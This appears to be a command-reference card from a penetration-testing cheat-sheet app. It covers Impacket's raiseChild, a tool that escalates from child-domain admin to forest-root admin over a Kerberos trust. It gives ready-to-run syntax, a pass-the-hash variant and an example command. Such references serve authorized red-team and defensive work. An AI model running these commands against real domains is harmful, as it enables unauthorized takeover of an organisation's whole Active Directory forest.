Impacket raiseChild

Escalate from child domain DA to forest root DA via inter-realm Kerberos trust

Tool
impacket-raiseChild
Category
Privilege Escalation / Trust Attacks
Platform
linux
Requires
password
Protocols
KERBEROS, LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-raiseChild '<child_domain>/<user>:<password>' -target-exec '<ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-raiseChild -hashes ':<hash>' '<child_domain>/<user>' -target-exec '<ip>'

Examples

impacket-raiseChild 'child.corp.local/domainadmin:password' -target-exec '192.168.1.1'

Tags

impacket raisechild forest trust domain-escalation sid-history